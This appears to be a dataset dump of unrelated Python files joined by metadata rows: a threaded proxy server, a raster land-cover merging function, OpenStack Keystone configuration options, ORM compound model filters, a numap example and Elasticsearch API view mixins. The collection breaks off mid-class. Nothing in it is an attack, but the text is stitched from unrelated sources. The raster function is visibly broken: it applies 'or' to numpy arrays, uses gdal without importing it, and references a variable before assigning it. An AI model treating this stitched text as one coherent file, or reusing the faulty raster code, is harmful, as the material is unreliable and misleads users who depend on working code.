class Proxy:
def __init__(self, host="0.0.0.0", port=1070):
self.host = host
self.port = port
def run(self):
try:
self.server = socket.socket()
self.server.bind((self.host, self.port))
self.server.listen(100)
except Exception as e:
logging.debug("[Server] Can not make proxy server on %s:%d " %(self.host, self.port) )
logging.debug(e)
return self.shutdown()
logging.info("[Server] Proxy Server running on %s:%d ..." %(self.host, self.port))
# run forever
try:
self.loop()
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logging.info('[Server] Unknow error ...')
logging.info(e)
finally:
self.shutdown()
def shutdown(self):
logging.info('[Server] Shutdown Proxy server ...')
return self.server.close()
def loop(self):
while True:
connection, address = self.server.accept()
session = Session(session=connection, host=address[0], port=address[1])
try:
thread.start_new_thread(session.start, () )
except Exception as e:
logging.debug("[Server] 会话异常...")
logging.info(e)
session.close()
if __name__ == '__main__':
host = "0.0.0.0"
port = 1070
proxy = Proxy(host=host, port=port)
proxy.run()
| gpl-3.0 | -8,861,070,895,592,761,000 | 28.355372 | 98 | 0.538851 | false | 4.054795 | false | false | false |
JoaquimPatriarca/senpy-for-gis | gasp/osm2lulc/combine.py | 1 | 7837 | """
Methods to update/combine authoritative Land Use/Land Cover Information
with OSM Data
"""
def update_globe_land_cover(
original_globe_raster, osm_urban_atlas_raster, osm_globe_raster, epsg,
updated_globe_raster, detailed_globe_raster):
"""
Update the original Glob Land 30 with the result of the conversion of
OSM DATA to the Globe Land Cover nomenclature;
Also updates he previous updated Glob Land 30 with the result of the
conversion of osm data to the Urban Atlas Nomenclature
"""
import os
import numpy as np
from gasp.torst.gdal import array_to_raster
from gasp.fromrst.gdal import rst_to_array
from gasp.gdal.properties.cells import get_cellsize
from gasp.gdal.properties.cells import get_nodata
# ############################# #
# Convert images to numpy array #
# ############################# #
np_globe_original = rst_to_array(original_globe_raster)
np_globe_osm = rst_to_array(osm_globe_raster)
np_ua_osm = rst_to_array(osm_urban_atlas_raster)
# ################################## #
# Check the dimension of both images #
# ################################## #
if np_globe_original.shape != np_globe_osm.shape:
return (
'The Globe Land 30 raster (original) do not have the same number'
' of columns/lines comparing with the Globe Land 30 derived '
'from OSM data'
)
elif np_globe_original.shape != np_ua_osm.shape:
return (
'The Globe Land 30 raster (original) do not have the same '
'number of columns/lines comparing with the Urban Atlas raster '
'derived from OSM data'
)
elif np_globe_osm.shape != np_ua_osm.shape:
return (
'The Globe Land 30 derived from OSM data do not have the same '
'number of columns/lines comparing with the Urban Atlas raster '
'derived from OSM data'
)
# ############## #
# Check Cellsize #
# ############## #
cell_of_rsts = get_cellsize(
[original_globe_raster, osm_globe_raster, osm_urban_atlas_raster],
xy=True
)
cell_globe_original = cell_of_rsts[original_globe_raster]
cell_globe_osm = cell_of_rsts[osm_globe_raster]
cell_ua_osm = cell_of_rsts[osm_urban_atlas_raster]
if cell_globe_original != cell_globe_osm:
return (
'The cellsize of the Globe Land 30 raster (original) is not the '
'same comparing with the Globe Land 30 derived from OSM data'
)
elif cell_globe_original != cell_ua_osm:
return (
'The cellsize of the Globe Land 30 raster (original) is not the '
'same comparing with the Urban Atlas raster derived from OSM data'
)
elif cell_ua_osm != cell_globe_osm:
return (
'The cellsize of the Globe Land 30 derived from OSM data is not '
'the same comparing with the Urban Atlas raster derived from '
'OSM data'
)
# ############################# #
# Get the Value of Nodata Cells #
# ############################# #
nodata_glob_original = get_nodata(original_globe_raster)
nodata_glob_osm = get_nodata(osm_globe_raster)
nodata_ua_osm = get_nodata(osm_urban_atlas_raster)
# ######################################## #
# Create a new map - Globe Land 30 Updated #
# ######################################## #
"""
Create a new array with zeros...
1) The zeros will be replaced by the values in the Globe Land derived from
OSM.
2) The zeros will be replaced by the values in the Original Globe Land at
the cells with NULL data in the Globe Land derived from OSM.
The meta array will identify values origins in the updated raster:
1 - Orinal Raster
2 - OSM Derived Raster
"""
update_array = np.zeros((
np_globe_original.shape[0], np_globe_original.shape[1]))
update_meta_array = np.zeros((
np_globe_original.shape[0], np_globe_original.shape[1]))
# 1)
np.copyto(update_array, np_globe_osm, 'no', np_globe_osm != nodata_glob_osm)
# 1) meta
np.place(update_meta_array, update_array != 0, 2)
# 2) meta
np.place(update_meta_array, update_array == 0, 1)
# 2)
np.copyto(update_array, np_globe_original, 'no', update_array == 0)
# 2) meta
np.place(
update_meta_array,
update_array==nodata_glob_original, int(nodata_glob_original)
)
# noData to int
np.place(
update_array, update_array==nodata_glob_original,
int(nodata_glob_original)
)
updated_meta = os.path.join(
os.path.dirname(updated_globe_raster),
'{n}_meta{e}'.format(
n = os.path.splitext(os.path.basename(updated_globe_raster))[0],
e = os.path.splitext(os.path.basename(updated_globe_raster))[1]
)
)
# Create Updated Globe Cover 30
array_to_raster(
update_array, updated_globe_raster, original_globe_raster, epsg,
gdal.GDT_Int32, noData=int(nodata_glob_original)
)
# Create Updated Globe Cover 30 meta
array_to_raster(
update_meta_array, updated_meta, original_globe_raster, epsg,
gdal.GDT_Int32, noData=int(nodata_glob_original)
)
# ################################################# #
# Create a new map - Globe Land 30 Detailed with UA #
# ################################################# #
np_update = rst_to_array(updated_globe_raster)
detailed_array = np.zeros((np_update.shape[0], np_update.shape[1]))
detailed_meta_array = np.zeros((
np_update.shape[0], np_update.shape[1]
))
"""
Replace 80 Globe Land for 11, 12, 13, 14 of Urban Atlas
The meta array will identify values origins in the detailed raster:
1 - Updated Raster
2 - UA Derived Raster from OSM
"""
# Globe - Mantain some classes
np.place(detailed_array, np_update==30, 8)
np.place(detailed_array, np_update==30, 1)
np.place(detailed_array, np_update==40, 9)
np.place(detailed_array, np_update==40, 1)
np.place(detailed_array, np_update==50, 10)
np.place(detailed_array, np_update==50, 1)
np.place(detailed_array, np_update==10, 5)
np.place(detailed_array, np_update==10, 1)
# Water bodies
np.place(detailed_array, np_ua_osm==50 or np_update==60, 7)
np.place(detailed_meta_array, np_ua_osm==50 or np_update==60, 1)
# Urban - Where Urban Atlas IS NOT NULL
np.place(detailed_array, np_ua_osm==11, 1)
np.place(detailed_meta_array, np_ua_osm==11, 2)
np.place(detailed_array, np_ua_osm==12, 2)
np.place(detailed_meta_array, np_ua_osm==12, 2)
np.place(detailed_array, np_ua_osm==13, 3)
np.place(detailed_meta_array, np_ua_osm==13, 2)
np.place(detailed_array, np_ua_osm==14, 4)
np.place(detailed_meta_array, np_ua_osm==14, 2)
# Urban Atlas - Class 30 to 6
np.place(detailed_array, np_ua_osm==30, 6)
np.place(detailed_meta_array, np_ua_osm==30, 2)
# Create Detailed Globe Cover 30
array_to_raster(
detailed_array, detailed_globe_raster, original_globe_raster, epsg,
gdal.GDT_Int32, noData=0
)
# Create Detailed Globe Cover 30 meta
detailed_meta = os.path.join(
os.path.dirname(detailed_globe_raster),
'{n}_meta{e}'.format(
n = os.path.splitext(os.path.basename(detailed_meta))[0],
e = os.path.splitext(os.path.basename(detailed_meta))[1]
)
)
array_to_raster(
detailed_meta_array, detailed_meta, original_globe_raster, epsg,
gdal.GDT_Int32, noData=0
)
| gpl-3.0 | 5,554,260,234,809,204,000 | 33.986607 | 80 | 0.584662 | false | 3.389706 | false | false | false |
dsiddharth/access-keys | keystone/common/config.py | 1 | 14051 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
_DEFAULT_AUTH_METHODS = ['external', 'password', 'token']
FILE_OPTIONS = {
'': [
cfg.StrOpt('admin_token', secret=True, default='ADMIN'),
cfg.StrOpt('public_bind_host',
default='0.0.0.0',
deprecated_opts=[cfg.DeprecatedOpt('bind_host',
group='DEFAULT')]),
cfg.StrOpt('admin_bind_host',
default='0.0.0.0',
deprecated_opts=[cfg.DeprecatedOpt('bind_host',
group='DEFAULT')]),
cfg.IntOpt('compute_port', default=8774),
cfg.IntOpt('admin_port', default=35357),
cfg.IntOpt('public_port', default=5000),
cfg.StrOpt('public_endpoint',
default='http://localhost:%(public_port)s/'),
cfg.StrOpt('admin_endpoint',
default='http://localhost:%(admin_port)s/'),
cfg.StrOpt('onready'),
# default max request size is 112k
cfg.IntOpt('max_request_body_size', default=114688),
cfg.IntOpt('max_param_size', default=64),
# we allow tokens to be a bit larger to accommodate PKI
cfg.IntOpt('max_token_size', default=8192),
cfg.StrOpt('member_role_id',
default='9fe2ff9ee4384b1894a90878d3e92bab'),
cfg.StrOpt('member_role_name', default='_member_'),
cfg.IntOpt('crypt_strength', default=40000)],
'identity': [
cfg.StrOpt('default_domain_id', default='default'),
cfg.BoolOpt('domain_specific_drivers_enabled',
default=False),
cfg.StrOpt('domain_config_dir',
default='/etc/keystone/domains'),
cfg.StrOpt('driver',
default=('keystone.identity.backends'
'.sql.Identity')),
cfg.IntOpt('max_password_length', default=4096)],
'trust': [
cfg.BoolOpt('enabled', default=True),
cfg.StrOpt('driver',
default='keystone.trust.backends.sql.Trust')],
'os_inherit': [
cfg.BoolOpt('enabled', default=False)],
'token': [
cfg.ListOpt('bind', default=[]),
cfg.StrOpt('enforce_token_bind', default='permissive'),
cfg.IntOpt('expiration', default=3600),
cfg.StrOpt('provider', default=None),
cfg.StrOpt('driver',
default='keystone.token.backends.sql.Token'),
cfg.BoolOpt('caching', default=True),
cfg.IntOpt('revocation_cache_time', default=3600),
cfg.IntOpt('cache_time', default=None)],
'cache': [
cfg.StrOpt('config_prefix', default='cache.keystone'),
cfg.IntOpt('expiration_time', default=600),
# NOTE(morganfainberg): the dogpile.cache.memory acceptable in devstack
# and other such single-process/thread deployments. Running
# dogpile.cache.memory in any other configuration has the same pitfalls
# as the KVS token backend. It is recommended that either Redis or
# Memcached are used as the dogpile backend for real workloads. To
# prevent issues with the memory cache ending up in "production"
# unintentionally, we register a no-op as the keystone default caching
# backend.
cfg.StrOpt('backend', default='keystone.common.cache.noop'),
cfg.BoolOpt('use_key_mangler', default=True),
cfg.MultiStrOpt('backend_argument', default=[]),
cfg.ListOpt('proxies', default=[]),
# Global toggle for all caching using the should_cache_fn mechanism.
cfg.BoolOpt('enabled', default=False),
# caching backend specific debugging.
cfg.BoolOpt('debug_cache_backend', default=False)],
'ssl': [
cfg.BoolOpt('enable', default=False),
cfg.StrOpt('certfile',
default="/etc/keystone/ssl/certs/keystone.pem"),
cfg.StrOpt('keyfile',
default="/etc/keystone/ssl/private/keystonekey.pem"),
cfg.StrOpt('ca_certs',
default="/etc/keystone/ssl/certs/ca.pem"),
cfg.StrOpt('ca_key',
default="/etc/keystone/ssl/private/cakey.pem"),
cfg.BoolOpt('cert_required', default=False),
cfg.IntOpt('key_size', default=1024),
cfg.IntOpt('valid_days', default=3650),
cfg.StrOpt('cert_subject',
default='/C=US/ST=Unset/L=Unset/O=Unset/CN=localhost')],
'signing': [
cfg.StrOpt('token_format', default=None),
cfg.StrOpt('certfile',
default="/etc/keystone/ssl/certs/signing_cert.pem"),
cfg.StrOpt('keyfile',
default="/etc/keystone/ssl/private/signing_key.pem"),
cfg.StrOpt('ca_certs',
default="/etc/keystone/ssl/certs/ca.pem"),
cfg.StrOpt('ca_key',
default="/etc/keystone/ssl/private/cakey.pem"),
cfg.IntOpt('key_size', default=2048),
cfg.IntOpt('valid_days', default=3650),
cfg.StrOpt('cert_subject',
default=('/C=US/ST=Unset/L=Unset/O=Unset/'
'CN=www.example.com'))],
'assignment': [
# assignment has no default for backward compatibility reasons.
# If assignment driver is not specified, the identity driver chooses
# the backend
cfg.StrOpt('driver', default=None),
cfg.BoolOpt('caching', default=True),
cfg.IntOpt('cache_time', default=None)],
'credential': [
cfg.StrOpt('driver',
default=('keystone.credential.backends'
'.sql.Credential'))],
'oauth1': [
cfg.StrOpt('driver',
default='keystone.contrib.oauth1.backends.sql.OAuth1'),
cfg.IntOpt('request_token_duration', default=28800),
cfg.IntOpt('access_token_duration', default=86400)],
'federation': [
cfg.StrOpt('driver',
default='keystone.contrib.federation.'
'backends.sql.Federation')],
'policy': [
cfg.StrOpt('driver',
default='keystone.policy.backends.sql.Policy')],
'ec2': [
cfg.StrOpt('driver',
default='keystone.contrib.ec2.backends.kvs.Ec2')],
'endpoint_filter': [
cfg.StrOpt('driver',
default='keystone.contrib.endpoint_filter.backends'
'.sql.EndpointFilter'),
cfg.BoolOpt('return_all_endpoints_if_no_filter', default=True)],
'stats': [
cfg.StrOpt('driver',
default=('keystone.contrib.stats.backends'
'.kvs.Stats'))],
'ldap': [
cfg.StrOpt('url', default='ldap://localhost'),
cfg.StrOpt('user', default=None),
cfg.StrOpt('password', secret=True, default=None),
cfg.StrOpt('suffix', default='cn=example,cn=com'),
cfg.BoolOpt('use_dumb_member', default=False),
cfg.StrOpt('dumb_member', default='cn=dumb,dc=nonexistent'),
cfg.BoolOpt('allow_subtree_delete', default=False),
cfg.StrOpt('query_scope', default='one'),
cfg.IntOpt('page_size', default=0),
cfg.StrOpt('alias_dereferencing', default='default'),
cfg.StrOpt('user_tree_dn', default=None),
cfg.StrOpt('user_filter', default=None),
cfg.StrOpt('user_objectclass', default='inetOrgPerson'),
cfg.StrOpt('user_id_attribute', default='cn'),
cfg.StrOpt('user_name_attribute', default='sn'),
cfg.StrOpt('user_mail_attribute', default='email'),
cfg.StrOpt('user_pass_attribute', default='userPassword'),
cfg.StrOpt('user_enabled_attribute', default='enabled'),
cfg.IntOpt('user_enabled_mask', default=0),
cfg.StrOpt('user_enabled_default', default='True'),
cfg.ListOpt('user_attribute_ignore',
default=['default_project_id', 'tenants']),
cfg.StrOpt('user_default_project_id_attribute', default=None),
cfg.BoolOpt('user_allow_create', default=True),
cfg.BoolOpt('user_allow_update', default=True),
cfg.BoolOpt('user_allow_delete', default=True),
cfg.BoolOpt('user_enabled_emulation', default=False),
cfg.StrOpt('user_enabled_emulation_dn', default=None),
cfg.ListOpt('user_additional_attribute_mapping',
default=[]),
cfg.StrOpt('tenant_tree_dn', default=None),
cfg.StrOpt('tenant_filter', default=None),
cfg.StrOpt('tenant_objectclass', default='groupOfNames'),
cfg.StrOpt('tenant_id_attribute', default='cn'),
cfg.StrOpt('tenant_member_attribute', default='member'),
cfg.StrOpt('tenant_name_attribute', default='ou'),
cfg.StrOpt('tenant_desc_attribute', default='description'),
cfg.StrOpt('tenant_enabled_attribute', default='enabled'),
cfg.StrOpt('tenant_domain_id_attribute',
default='businessCategory'),
cfg.ListOpt('tenant_attribute_ignore', default=[]),
cfg.BoolOpt('tenant_allow_create', default=True),
cfg.BoolOpt('tenant_allow_update', default=True),
cfg.BoolOpt('tenant_allow_delete', default=True),
cfg.BoolOpt('tenant_enabled_emulation', default=False),
cfg.StrOpt('tenant_enabled_emulation_dn', default=None),
cfg.ListOpt('tenant_additional_attribute_mapping',
default=[]),
cfg.StrOpt('role_tree_dn', default=None),
cfg.StrOpt('role_filter', default=None),
cfg.StrOpt('role_objectclass', default='organizationalRole'),
cfg.StrOpt('role_id_attribute', default='cn'),
cfg.StrOpt('role_name_attribute', default='ou'),
cfg.StrOpt('role_member_attribute', default='roleOccupant'),
cfg.ListOpt('role_attribute_ignore', default=[]),
cfg.BoolOpt('role_allow_create', default=True),
cfg.BoolOpt('role_allow_update', default=True),
cfg.BoolOpt('role_allow_delete', default=True),
cfg.ListOpt('role_additional_attribute_mapping',
default=[]),
cfg.StrOpt('group_tree_dn', default=None),
cfg.StrOpt('group_filter', default=None),
cfg.StrOpt('group_objectclass', default='groupOfNames'),
cfg.StrOpt('group_id_attribute', default='cn'),
cfg.StrOpt('group_name_attribute', default='ou'),
cfg.StrOpt('group_member_attribute', default='member'),
cfg.StrOpt('group_desc_attribute', default='description'),
cfg.ListOpt('group_attribute_ignore', default=[]),
cfg.BoolOpt('group_allow_create', default=True),
cfg.BoolOpt('group_allow_update', default=True),
cfg.BoolOpt('group_allow_delete', default=True),
cfg.ListOpt('group_additional_attribute_mapping',
default=[]),
cfg.StrOpt('tls_cacertfile', default=None),
cfg.StrOpt('tls_cacertdir', default=None),
cfg.BoolOpt('use_tls', default=False),
cfg.StrOpt('tls_req_cert', default='demand')],
'pam': [
cfg.StrOpt('userid', default=None),
cfg.StrOpt('password', default=None)],
'auth': [
cfg.ListOpt('methods', default=_DEFAULT_AUTH_METHODS),
cfg.StrOpt('password',
default='keystone.auth.plugins.password.Password'),
cfg.StrOpt('token',
default='keystone.auth.plugins.token.Token'),
#deals with REMOTE_USER authentication
cfg.StrOpt('external',
default='keystone.auth.plugins.external.DefaultDomain')],
'paste_deploy': [
cfg.StrOpt('config_file', default=None)],
'memcache': [
cfg.ListOpt('servers', default=['localhost:11211']),
cfg.IntOpt('max_compare_and_set_retry', default=16)],
'catalog': [
cfg.StrOpt('template_file',
default='default_catalog.templates'),
cfg.StrOpt('driver',
default='keystone.catalog.backends.sql.Catalog')],
'kvs': [
cfg.ListOpt('backends', default=[]),
cfg.StrOpt('config_prefix', default='keystone.kvs'),
cfg.BoolOpt('enable_key_mangler', default=True),
cfg.IntOpt('default_lock_timeout', default=5)]}
CONF = cfg.CONF
def setup_authentication(conf=None):
# register any non-default auth methods here (used by extensions, etc)
if conf is None:
conf = CONF
for method_name in conf.auth.methods:
if method_name not in _DEFAULT_AUTH_METHODS:
conf.register_opt(cfg.StrOpt(method_name), group='auth')
def configure(conf=None):
if conf is None:
conf = CONF
conf.register_cli_opt(
cfg.BoolOpt('standard-threads', default=False,
help='Do not monkey-patch threading system modules.'))
conf.register_cli_opt(
cfg.StrOpt('pydev-debug-host', default=None,
help='Host to connect to for remote debugger.'))
conf.register_cli_opt(
cfg.IntOpt('pydev-debug-port', default=None,
help='Port to connect to for remote debugger.'))
for section in FILE_OPTIONS:
for option in FILE_OPTIONS[section]:
if section:
conf.register_opt(option, group=section)
else:
conf.register_opt(option)
# register any non-default auth methods here (used by extensions, etc)
setup_authentication(conf)
| apache-2.0 | 7,931,056,553,063,509,000 | 44.472492 | 79 | 0.597822 | false | 4.048113 | true | false | false |
rcosnita/fantastico | fantastico/mvc/models/model_filter_compound.py | 1 | 5048 | '''
Copyright 2013 Cosnita Radu Viorel
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
.. codeauthor:: Radu Viorel Cosnita <[email protected]>
.. py:module:fantastico.mvc.models.model_filter_compound
'''
from fantastico.exceptions import FantasticoNotSupportedError, FantasticoError
from fantastico.mvc.models.model_filter import ModelFilterAbstract
from sqlalchemy.sql.expression import and_, or_
class ModelFilterCompound(ModelFilterAbstract):
'''This class provides the api for compounding ModelFilter objects into a specified sql alchemy operation.'''
@property
def model_filters(self):
'''This property returns all ModelFilter instances being compound.'''
return self._model_filters
def __init__(self, operation, *args):
if len(args) < 2:
raise FantasticoNotSupportedError("Compound filter takes at least 2 simple model filters.")
for arg in args:
if not isinstance(arg, ModelFilterAbstract):
raise FantasticoNotSupportedError("ModelFilterAnd accept only arguments of type ModelFilter.")
self._operation = operation
self._model_filters = args
def build(self, query):
'''This method transform the current compound statement into an sql alchemy filter.'''
try:
for model_filter in self._model_filters:
# pylint: disable=W0212
if hasattr(query, "_primary_entity") and model_filter.column.table != query._primary_entity.selectable \
and hasattr(query, "_joinpoint") and not (model_filter.column.table in query._joinpoint.values()):
query = query.join(model_filter.column.table)
return query.filter(self.get_expression())
except Exception as ex:
raise FantasticoError(ex)
def get_expression(self):
'''This method transforms calculates sqlalchemy expression held by this filter.'''
return self._operation(*[model_filter.get_expression() for model_filter in self._model_filters])
def __eq__(self, obj):
'''This method is overriden in order to correctly evaluate equality of two compound model filters.'''
if type(self) != type(obj):
return False
if len(obj.model_filters) != len(self.model_filters):
return False
for idx in range(0, len(self.model_filters)):
if self.model_filters[idx] != obj.model_filters[idx]:
return False
return True
def __hash__(self):
'''This method generates a hash code for compound model filters.'''
result = hash(self.model_filters[0])
for idx in range(1, len(self.model_filters)):
result ^= hash(self.model_filters[idx])
return result
class ModelFilterAnd(ModelFilterCompound):
'''This class provides a compound filter that allows **and** conditions against models. Below you can find a simple example:
.. code-block:: python
id_gt_filter = ModelFilter(PersonModel.id, 1, ModelFilter.GT)
id_lt_filter = ModelFilter(PersonModel.id, 5, ModelFilter.LT)
name_like_filter = ModelFilter(PersonModel.name, '%%john%%', ModelFilter.LIKE)
complex_condition = ModelFilterAnd(id_gt_filter, id_lt_filter, name_like_filter)
'''
def __init__(self, *args):
super(ModelFilterAnd, self).__init__(and_, *args)
class ModelFilterOr(ModelFilterCompound):
'''This class provides a compound filter that allows **or** conditions against models. Below you can find a simple example:
.. code-block:: python
id_gt_filter = ModelFilter(PersonModel.id, 1, ModelFilter.GT)
id_lt_filter = ModelFilter(PersonModel.id, 5, ModelFilter.LT)
name_like_filter = ModelFilter(PersonModel.name, '%%john%%', ModelFilter.LIKE)
complex_condition = ModelFilterOr(id_gt_filter, id_lt_filter, name_like_filter)
'''
def __init__(self, *args):
super(ModelFilterOr, self).__init__(or_, *args)
| mit | 3,021,974,887,476,876,300 | 42.895652 | 128 | 0.684826 | false | 4.267117 | false | false | false |
mcieslik-mctp/papy | doc/examples/buffer.py | 1 | 1113 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from numap import NuMap
from time import sleep
def printer(element):
print element
return element
LEFT_INPUT = ('L0', 'L1', 'L2', 'L3')
RIGHT_INPUT = ('R0', 'R1', 'R2', 'R3')
# LEFT_INPUT RIGHT_INPUT
# | |
# |(printer) |(printer)
# | |
# left_iter right_iter
numap = NuMap(stride=2, buffer=6)
left_iter = numap.add_task(printer, LEFT_INPUT)
right_iter = numap.add_task(printer, RIGHT_INPUT)
# BUFFER 6 6 ...
# ---------------------- ------
# STRIDES 2 2 2 2
# ------ ------ ------ ------
# order of input L0, L1, R0, R1, L2, L3, R2, R3
print "first 6:"
numap.start()
sleep(1)
# should print:
# L0, L1, R0, R1, L2, L3
print "last 2:"
L0 = left_iter.next()
L1 = left_iter.next()
# should print:
# R2, R3
R0 = right_iter.next()
R1 = right_iter.next()
L2 = left_iter.next()
L3 = left_iter.next()
R2 = right_iter.next()
R3 = right_iter.next()
assert (L0, L1, L2, L3) == LEFT_INPUT
assert (R0, R1, R2, R3) == RIGHT_INPUT
| mit | 4,727,368,988,170,081,000 | 19.611111 | 49 | 0.515723 | false | 2.576389 | false | false | false |
lavalamp-/ws-backend-community | rest/views/elasticsearch/models/mixin.py | 1 | 25755 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from django.shortcuts import get_object_or_404
from rest_framework.settings import api_settings
from ..mixin import BaseElasticsearchAPIViewMixin
from lib import ValidationHelper, ConfigManager, get_export_type_wrapper_map
from rest.lib import PaginationSerializer
from .exception import TooManyEsResultsError
config = ConfigManager.instance()
logger = logging.getLogger(__name__)
class BaseElasticsearchMappedAPIViewMixin(BaseElasticsearchAPIViewMixin):
"""
This is a base mixin for all Elasticsearch APIView classes that query Elasticsearch models which are
mapped to database model instances.
"""
# Class Members
_db_object = None
_filter_by_parent_db_object = True
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_db_model_class(cls):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _check_permissions(self):
return self._check_db_object_permissions()
def _check_db_object_permissions(self):
"""
Check to see if the requesting user has sufficient permissions to be querying self.db_object.
:return: True if the requesting user has sufficient permissions to be querying self.db_object, False
otherwise.
"""
raise NotImplementedError("Subclasses must implement this!")
# Private Methods
def __get_db_object(self):
"""
Get the database object that the queried Elasticsearch data should be tied to.
:return: The database object that the queried Elasticsearch data should be tied to.
"""
to_return = get_object_or_404(self.db_model_class, pk=self.kwargs["pk"])
return to_return
# Properties
@property
def db_object(self):
"""
Get the database object that the queried Elasticsearch data should be tied to.
:return: the database object that the queried Elasticsearch data should be tied to.
"""
if self._db_object is None:
self._db_object = self.__get_db_object()
return self._db_object
@property
def db_model_class(self):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
return self.__class__.get_db_model_class()
@property
def filter_by_parent_db_object(self):
"""
Get whether or not Elasticsearch results should be filtered upon based on the mapped database object.
:return: whether or not Elasticsearch results should be filtered upon based on the mapped database object.
"""
return self._filter_by_parent_db_object
# Representation and Comparison
class BaseElasticsearchSingleMappedAPIViewMixin(BaseElasticsearchMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query single instances of
Elasticsearch models that are in turn paired with database models.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def _extract_contents_from_response(self, response):
if response.results_count > 1:
raise TooManyEsResultsError(
"Total of %s results retrieved in call to %s."
% (response.results_count, self.__class__.__name__)
)
elif response.results_count == 0:
raise Http404
else:
return self._get_object_from_result(response.results[0])
# Protected Methods
# Private Methods
# Properties
# Representation and Comparison
class BaseElasticsearchFilterableMappedAPIViewMixin(BaseElasticsearchMappedAPIViewMixin):
"""
This is a base mixin class for Elasticsearch query classes that enable clients to filter results of
the Elasticsearch query.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def get(self, *args, **kwargs):
to_return = super(BaseElasticsearchFilterableMappedAPIViewMixin, self).get(*args, **kwargs)
to_return.data["filter_fields"] = self.filter_fields
return to_return
# Protected Methods
def _apply_filters_to_query(self, query):
query = super(BaseElasticsearchFilterableMappedAPIViewMixin, self)._apply_filters_to_query(query)
query = self.__apply_query_string_filters(query)
return query
# Private Methods
def __apply_query_string_filters(self, query):
"""
Apply filters to the given query based on the contents of the query string in self.request.
:param query: The query to add filters to.
:return: The query with filters added.
"""
for filter_key in self.hard_filterable_fields:
if filter_key in self.request.query_params:
filter_value = self.request.query_params.get(filter_key)
query.must_by_term(key=filter_key, value=filter_value, verify_key=True, include=True)
elif "-%s" % (filter_key,) in self.request.query_params:
filter_value = self.request.query_params.get("-%s" % (filter_key,))
query.must_by_term(key=filter_key, value=filter_value, verify_key=True, include=False)
for filter_key in self.soft_filterable_fields:
if filter_key in self.request.query_params:
filter_value = self.request.query_params.get(filter_key)
query.must_by_term(key=filter_key, value=filter_value, verify_key=False, include=True)
elif "-%s" % (filter_key,) in self.request.query_params:
filter_value = self.request.query_params.get("-%s" % (filter_key,))
query.must_by_term(key=filter_key, value=filter_value, verify_key=False, include=False)
if self.has_search_argument:
query.set_search_term(term=self.search_argument, field="_all")
return query
# Properties
@property
def filter_fields(self):
"""
Get a list of the fields that the Elasticsearch model referenced by this
view can be filtered on.
:return: a list of the fields that the Elasticsearch model referenced by
this view can be filtered on.
"""
return self.soft_filterable_fields + self.hard_filterable_fields
@property
def hard_filterable_fields(self):
"""
Get a list of strings representing the fields that are explicitly declared on the
queried Elasticsearch model that can be filtered against.
:return: a list of strings representing the fields that are explicitly declared on
the queried Elasticsearch model that can be filtered against.
"""
return self.queryable_model_fields
@property
def has_search_argument(self):
"""
Get whether or not the request has a search argument.
:return: whether or not the request has a search argument.
"""
return settings.SEARCH_PARAM in self.request.query_params
@property
def search_argument(self):
"""
Get the search argument from the request query string.
:return: the search argument from the request query string.
"""
if self._search_argument is None:
self._search_argument = self.request.query_params.get(settings.SEARCH_PARAM, "")
return self._search_argument
@property
def soft_filterable_fields(self):
"""
Get a list of strings representing the fields that are not explicitly declared on
the queried Elasticsearch model that can be filtered against.
:return: A list of strings representing the fields that are not explicitly declared
on the queried Elasticsearch model that can be filtered against.
"""
return []
# Representation and Comparison
class BaseElasticsearchAnalyticsAPIViewMixin(BaseElasticsearchFilterableMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query Elasticsearch to retrieve
analytical data about models.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
# Protected Methods
def _apply_aggregates_to_query(self, query):
"""
Apply the necessary aggregates to the given query and return it.
:param query: The query to add aggregates to.
:return: The query with the added aggregates.
"""
raise NotImplementedError("Subclasses must implement this!")
def _extract_contents_from_response(self, response):
to_return = {}
for aggregate_name, aggregate in self.query.aggregates.iteritems():
to_return[aggregate_name] = aggregate.unpack_response(response.aggregations[aggregate_name])
return to_return
def _query_elasticsearch(self):
es_index = self._get_elasticsearch_index()
self._query = self.es_query_class(suppress_source=True)
self._query = self._apply_filters_to_query(self._query)
self._query = self._apply_aggregates_to_query(self._query)
return self._query.search(index=es_index)
# Private Methods
# Properties
# Representation and Comparison
class BaseElasticsearchManyMappedAPIViewMixin(BaseElasticsearchFilterableMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query Elasticsearch models that are paired
with database models and that return multiple instances of the queried model.
"""
# Class Members
